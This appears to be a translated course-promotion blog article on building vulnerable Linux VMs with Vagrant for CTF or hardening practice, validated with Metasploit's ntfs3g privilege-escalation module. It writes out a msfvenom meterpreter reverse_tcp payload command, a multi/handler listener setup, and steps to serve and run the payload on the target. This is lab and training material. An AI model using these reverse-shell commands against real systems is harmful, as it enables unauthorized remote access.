For future students of the course “Administrator Linux.Basic“ and everyone interested in the topic prepared an article by Alexander Kolesnikov.
We invite everyone to sign up for open webinar “Iptables”.
The article will tell you about a non-standard approach for using the system of configuration of virtual environments. The process of creating a vulnerable version of a Linux virtual machine for CTF competitions or for practice of hardening operating systems will be shown.
For an example of creating an already configured virtual machine, we will use Vagrant… It is a very simple tool that allows you to configure operating systems in a virtualized environment. For a long time, the system worked only with VirtualBox, but now there is support for VMWare and even containerization systems such as Docker and LXC.
Why use the autoconfiguration system? After all, it is easier to collect all the necessary software in one place, then spend a couple of days installing and configuring it, and then you can use the OS. The answer is simple – setting up any operating system is a lengthy and repetitive process. Therefore, if it can be automated, then it is worth doing it and spending the rest of the time studying additional material about the administration and operation of operating systems.
The concept behind Vagrant is that you can create a base image of the operating system and then use it for more granular configuration. Such “off-the-shelf” operating systems are called box. They can be found in the special catalogwhere other Vagrant users post them. (It’s worth remembering that anything can potentially be installed in them, including malware). Since the image cannot be prepared for all tasks, the system documentation says that if the installation of components that need to be deployed in a virtual machine is very difficult to configure and load for a long time, then it is worth adding them immediately to box. If fine tuning can be started and will take uncritical time, then you can use a script that will execute everything at the start of the system.
Let’s try using Vagrant to configure vulnerable Linux versions.
For tests, Vagrant version 2.2.15 will be used. It is recommended to install Vargant from its official site… Because the versions of Vagrant that can be found in the repositories and OS shipments may not contain all the required dependencies. At our booth, the virtualization environment VirtualBox 6.1 was separately installed.
The task of creating a virtual machine that will contain some kind of vulnerability is quite nontrivial. Each time you create such “special” machines, you need:
Find a public description of the vulnerability
Find a set of tools for a public vulnerability to detect and test it
With the first point, everything can go smoothly enough. Since there are databases that contain information about existing vulnerabilities, the second and third points may never find a solution for a single vulnerability. Because either there will be no description of the vulnerability, or no one will publish the tools. In our experiment, let’s go from the opposite – let’s try to take a vulnerability that can be exploited by the Metasploit framework and try to analyze the exploit script and create a vulnerable Linux system for it.
Script selection and analysis
The script will be selected from the Metasploit 6.0.22-dev version. We do not need to have the latest version as exploits do not appear there very quickly. To find the required script, you need to start the framework management console:
And set a filter for the list of all available scripts with exploits:
Having scrolled through the result a little, let’s take the script –
exploit/linux/local/ntfs3g_priv_esc… As the description of this script says, it does escalation of privileges on vulnerable Debian / Ubuntu systems. To work with it and find out which version of the OS we need, open the script for editing:
use exploit/linux/local/ntfs3g_priv_esc edit
The structure of the exploit modules in the framework is quite simple – each command from the control console has a function of the same name, which is described inside the script. For example exploit:
No exploit in Metasploit since version 6.0 will work if it does not check whether the system is vulnerable to a specific exploit. Therefore, it will be enough to scroll to the place where the algorithm of the “check” function is described. A little below we find it:
Now that we have all the OS versions we need, let’s move on to the stage of building the virtual machine.
As described earlier, Vagrant is based on box objects, which represent the underlying OS and some software. Usually only the OS, but it all depends on what the administrator needs. Let’s try to find the required box in catalog… As the check function says, we need box, ubuntu 16.04 / 16.10 or Debian 7/8. Vulnerable software will be installed on the system by default. It is also worth considering that this version of the exploit will only work if there is already access to any user inside the system.
Let’s take 2 boxes for the test:
The installation procedure for each of them is quite simple. For each of them we create our own directory and run commands in the corresponding directories. For the first:
vagrant init wyeworks/ubuntu-16.10 && vagrant up && vagrant halt
For the second:
vagrant init generic/ubuntu1610 && vagrant up && vagrant halt
After these commands work, you need to open the VBox interface, at the very bottom of the list of machines, 2 machines with a random name will appear. These are deployed systems. So that now you can bring the experience to the end. Let’s change the network adapter from “NAT” to “Host-Only”. Let’s connect the Metasploit machine to this network. Next, we perform the following operation for tests:
We create a meterpreter to configure interaction with vulnerable systems:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=9999 -f elf -o testVagrant
We start the listener on the machine with Metasploit, enter the commands in the control console
use exploit/multi/handler set PAYLOAD linux/x64/meterpreter/reverse_tcp set LHOST 192.168.1.103 set LPORT 9999 exploit -j
Deliver the file
python3 -m http.server 9090
Download the file to the vulnerable system:
Let’s run the file on the second machine:
chmod +x ./testVagrant && ./testVagrant
We get the connection:
It seems that the system is invulnerable due to the fact that a vulnerable module has been removed. Let’s try to run everything the same on the first machine:
Bingo – vulnerable system found, box can be used to deploy vulnerable stands. Thus, having spent only 15 minutes, you can configure a large number of virtual machines and find the one with the required characteristics. And if the customization came from an installation image, it could be spent all day.
Learn more about the course “Administrator Linux.Basic“ …